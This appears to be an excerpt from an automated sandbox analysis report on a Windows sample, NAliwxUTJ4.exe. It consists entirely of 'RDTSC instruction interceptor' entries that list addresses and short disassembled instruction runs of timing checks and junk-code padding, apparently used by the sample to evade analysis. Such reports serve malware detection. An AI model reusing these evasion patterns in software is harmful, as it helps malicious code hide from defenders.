              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E53C2 second address: 5E53C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E570B second address: 5E5711 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E5B4C second address: 5E5BDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FEBD887DA7Eh 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007FEBD887DA78h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 xor cx, 92C0h 0x0000002e call 00007FEBD887DA7Bh 0x00000033 mov dword ptr [ebp+122D1B5Ch], edi 0x00000039 pop edx 0x0000003a lea eax, dword ptr [ebp+124805B2h] 0x00000040 push 00000000h 0x00000042 push ebp 0x00000043 call 00007FEBD887DA78h 0x00000048 pop ebp 0x00000049 mov dword ptr [esp+04h], ebp 0x0000004d add dword ptr [esp+04h], 0000001Bh 0x00000055 inc ebp 0x00000056 push ebp 0x00000057 ret 0x00000058 pop ebp 0x00000059 ret 0x0000005a mov dl, A4h 0x0000005c nop 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007FEBD887DA82h 0x00000066 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E5BDE second address: 5E5BE8 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FEBD8FBE236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E5BE8 second address: 5E5C59 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnc 00007FEBD887DA7Ah 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007FEBD887DA78h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 00000018h 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a lea eax, dword ptr [ebp+1248056Eh] 0x00000030 push 00000000h 0x00000032 push ecx 0x00000033 call 00007FEBD887DA78h 0x00000038 pop ecx 0x00000039 mov dword ptr [esp+04h], ecx 0x0000003d add dword ptr [esp+04h], 00000016h 0x00000045 inc ecx 0x00000046 push ecx 0x00000047 ret 0x00000048 pop ecx 0x00000049 ret 0x0000004a mov dword ptr [ebp+122D1BC1h], ecx 0x00000050 ja 00007FEBD887DA7Ch 0x00000056 nop 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b push edi 0x0000005c pop edi 0x0000005d rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E5C59 second address: 5E5C5F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E5C5F second address: 5E5C64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 618515 second address: 618519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 618519 second address: 61851F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 61851F second address: 61852B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 61852B second address: 61852F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 61852F second address: 61854E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FEBD8FBE245h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6186D9 second address: 6186DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 618817 second address: 61881B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 61881B second address: 61883D instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEBD887DA76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FEBD887DA83h 0x0000000f pop edi 0x00000010 pushad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 618B18 second address: 618B22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FEBD8FBE236h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 618B22 second address: 618B4C instructions: 0x00000000 rdtsc 0x00000002 jng 00007FEBD887DA76h 0x00000008 jmp 00007FEBD887DA82h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jng 00007FEBD887DA7Eh 0x00000015 pushad 0x00000016 popad 0x00000017 jnp 00007FEBD887DA76h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5AC528 second address: 5AC52E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5AC52E second address: 5AC532 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6226A6 second address: 6226CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FEBD8FBE23Eh 0x0000000e jne 00007FEBD8FBE241h 0x00000014 jmp 00007FEBD8FBE23Bh 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6226CD second address: 6226EB instructions: 0x00000000 rdtsc 0x00000002 jc 00007FEBD887DA89h 0x00000008 jmp 00007FEBD887DA81h 0x0000000d pushad 0x0000000e popad 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6226EB second address: 6226F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 622836 second address: 622852 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD887DA88h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 622852 second address: 62285E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FEBD8FBE236h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 62285E second address: 622862 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 622CBC second address: 622CC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 622CC0 second address: 622CC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 622FDB second address: 622FE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 62314A second address: 623154 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 623154 second address: 62315E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FEBD8FBE236h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 62315E second address: 623162 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 623280 second address: 623284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 623284 second address: 623288 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6220B9 second address: 6220C7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEBD8FBE236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6220C7 second address: 6220CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6220CB second address: 6220DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FEBD8FBE236h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push ecx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 62B2E5 second address: 62B2F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD887DA7Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 62B2F7 second address: 62B2FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 62AD83 second address: 62AD8E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 62AD8E second address: 62ADB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FEBD8FBE249h 0x0000000e jne 00007FEBD8FBE236h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 62ADB6 second address: 62ADBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 62BA19 second address: 62BA31 instructions: 0x00000000 rdtsc 0x00000002 js 00007FEBD8FBE236h 0x00000008 jbe 00007FEBD8FBE236h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jng 00007FEBD8FBE236h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 62BA31 second address: 62BA40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD887DA7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 62BA40 second address: 62BA50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FEBD8FBE236h 0x0000000a jnl 00007FEBD8FBE236h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 62C01E second address: 62C028 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEBD887DA76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 62C028 second address: 62C032 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop esi 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 62F116 second address: 62F133 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FEBD887DA87h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 62F133 second address: 62F139 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 62F139 second address: 62F143 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FEBD887DA76h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 62F143 second address: 62F149 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 62ECFD second address: 62ED0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 js 00007FEBD887DA7Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 62ED0C second address: 62ED2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FEBD8FBE242h 0x0000000e jc 00007FEBD8FBE238h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6314BF second address: 6314C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 631164 second address: 63116A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 63116A second address: 63117A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FEBD887DA76h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 63117A second address: 631184 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FEBD8FBE236h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 631184 second address: 63118A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 63515F second address: 63519B instructions: 0x00000000 rdtsc 0x00000002 je 00007FEBD8FBE236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FEBD8FBE23Fh 0x0000000f push ecx 0x00000010 jmp 00007FEBD8FBE249h 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 jl 00007FEBD8FBE236h 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 634BC1 second address: 634BCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FEBD887DA76h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 634BCB second address: 634BCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 634E85 second address: 634E93 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 63A2C9 second address: 63A2FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEBD8FBE247h 0x00000008 push eax 0x00000009 pop eax 0x0000000a jno 00007FEBD8FBE236h 0x00000010 popad 0x00000011 jnp 00007FEBD8FBE242h 0x00000017 jne 00007FEBD8FBE236h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 63A59F second address: 63A5B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD887DA85h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 63A5B8 second address: 63A5BD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E5575 second address: 5E55B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEBD887DA82h 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d add ecx, dword ptr [ebp+122D3453h] 0x00000013 mov dword ptr [ebp+122D1E43h], ebx 0x00000019 mov ebx, dword ptr [ebp+124805ADh] 0x0000001f mov dword ptr [ebp+1246584Fh], edx 0x00000025 add eax, ebx 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E55B0 second address: 5E55B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E55B4 second address: 5E55BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E55BA second address: 5E55C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 63A99A second address: 63A9A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FEBD887DA76h 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 63E682 second address: 63E686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 63E686 second address: 63E68A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 63EBE9 second address: 63EC21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD8FBE244h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnp 00007FEBD8FBE253h 0x00000010 jmp 00007FEBD8FBE247h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 63EC21 second address: 63EC29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 644392 second address: 644398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 64451B second address: 644525 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FEBD887DA76h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6446CC second address: 6446EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEBD8FBE23Eh 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c jl 00007FEBD8FBE236h 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6446EE second address: 644704 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEBD887DA80h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 644F9F second address: 644FBC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FEBD8FBE247h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 644FBC second address: 644FC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FEBD887DA76h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 64527D second address: 645285 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 645285 second address: 6452B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD887DA80h 0x00000007 jmp 00007FEBD887DA89h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6452B6 second address: 6452BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 645592 second address: 64559E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FEBD887DA76h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 64559E second address: 6455BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FEBD8FBE23Dh 0x0000000a pushad 0x0000000b ja 00007FEBD8FBE236h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6455BD second address: 6455E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 je 00007FEBD887DA76h 0x0000000c pop ebx 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FEBD887DA81h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6455E1 second address: 64560D instructions: 0x00000000 rdtsc 0x00000002 jg 00007FEBD8FBE236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007FEBD8FBE238h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FEBD8FBE246h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 645F40 second address: 645F5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEBD887DA7Bh 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FEBD887DA76h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 64B837 second address: 64B83B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 64B83B second address: 64B888 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FEBD887DA7Ah 0x0000000b jmp 00007FEBD887DA82h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FEBD887DA87h 0x00000018 jmp 00007FEBD887DA81h 0x0000001d rdtsc
